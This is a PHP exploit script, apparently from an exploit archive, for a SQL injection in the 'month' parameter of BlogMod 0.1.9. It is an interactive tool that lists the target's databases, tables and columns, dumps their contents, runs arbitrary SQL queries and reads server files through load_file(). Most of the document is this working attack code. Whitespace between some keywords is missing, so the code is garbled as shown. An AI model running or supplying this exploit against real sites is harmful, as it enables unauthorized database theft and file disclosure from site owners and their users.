<?php/*
# Exploit Title: BlogMod <= 0.1.9 SQLi Exploit
# Date: 04th october 2012
# Exploit Author: WhiteCollarGroup
# Software Link: http://www.codigofonte.net/scripts/php/blog/367_blog-mod
# Version: 0.1.9
~> How does this exploit works?
It exploits one of the several SQL Injections in the system.
Specifiedly, in the file "index.php", parr "month".
Usage:
php filename.php
*/functionputs($str){echo$str."\n";}functiongets(){returntrim(fgets(STDIN));}functionhex($string){$hex='';// PHP 'Dim' =]for($i=0;$i<strlen($string);$i++){$hex.=dechex(ord($string[$i]));}return'0x'.$hex;}$token=uniqid();$token_hex=hex($token);puts("BlogMod <= X SQL Injection Exploit");puts("By WhiteCollarGroup");puts("[?] Enter website URL (e. g.: http://www.target.com/blogmod/):");$target=gets();puts("[*] Checking...");if(!@file_get_contents($target))die("[!] Access error: check domain and path.");if(substr($target,(strlen($target)-1))!="/")$target.="/";functionrunquery($query){global$target,$token,$token_hex;$query=preg_replace("/;$/",null,$query);$query=urlencode($query);$rodar=$target."index.php?year=2012&month=-0%20union%20all%20select%201,2,concat%28$token_hex,%28$query%29,$token_hex%29,4,5,6--%20";$get=file_get_contents($rodar);$matches=array();preg_match_all("/$token(.*)$token/",$get,$matches);if(isset($matches[1][0]))return$matches[1][0];elsereturnfalse;}if(runquery("SELECT $token_hex")!=$token){// error
exit;}functionmain($msg=null){global$token,$token_hex;echo"\n".$msg."\n";puts("[>] MAIN MENU");puts("[1] Browse MySQL");puts("[2] Run SQL Query");puts("[3] Read file");puts("[4] About");puts("[0] Exit");$resp=gets();if($resp=="0")
exit;elseif($resp=="1"){// pega dbs$i=0;puts("[.] Getting databases:");while(true){$pega=runquery("SELECT schema_name FROM information_schema.schemata LIMIT $i,1");if($pega)puts(" - ".$pega);elsebreak;$i++;}puts("[!] Current database: ".runquery("SELECT database()"));puts("[?] Enter database name for select:");$own=array();$own['db']=gets();$own['dbh']=hex($own['db']);// pega tables da db$i=0;puts("[.] Getting tables from $own[db]:");while(true){$pega=runquery("SELECT table_name FROM information_schema.tables WHERE table_schema=$own[dbh] LIMIT $i,1");if($pega)puts(" - ".$pega);elsebreak;$i++;}puts("[?] Enter table name for select:");$own['tb']=gets();$own['tbh']=hex($own['tb']);// pega colunas da table$i=0;puts("[.] Getting columns from $own[db].$own[tb]:");while(true){$pega=runquery("SELECT column_name FROM information_schema.columns WHERE table_schema=$own[dbh] AND table_name=$own[tbh] LIMIT $i,1");if($pega)puts(" - ".$pega);elsebreak;$i++;}puts("[?] Enter columns name, separated by commas (\",\") for select:");$own['cl']=explode(",",gets());// pega dados das colunasforeach($own['cl']as$coluna){$i=0;puts("[=] Column: $coluna");while(true){$pega=runquery("SELECT $coluna FROM $own[db].$own[tb] LIMIT $i,1");if($pega){puts(" - $pega");$i++;}elsebreak;}echo"\n[ ] -+-\n";}main();}elseif($resp=="2"){puts("[~] RUN SQL QUERY");puts("[!] You can run a SQL code. It can returns a one-line and one-column content. You can also use concat() or group_concat().");puts("[?] Query (enter for exit): ");$query=gets();if(!$query)main();elsemain(runquery($query."\n"));}elseif($resp=="3"){puts("[?] File path (may not have priv):");$file=hex(gets());$le=runquery("SELECT load_file($file) AS wc");if($le)main($le);elsemain("File not found, empty or no priv!");}elseif($resp=="4"){puts("Coded by WhiteCollarGroup");puts("www.wcgroup.host56.com");puts("whitecollar_group@hotmail.com");puts("twitter.com/WCollarGroup");puts("facebook.com/WCollarGroup");puts("wcollargroup.blogspot.com");main();}elsemain("[!] Wrong choice.");}main();
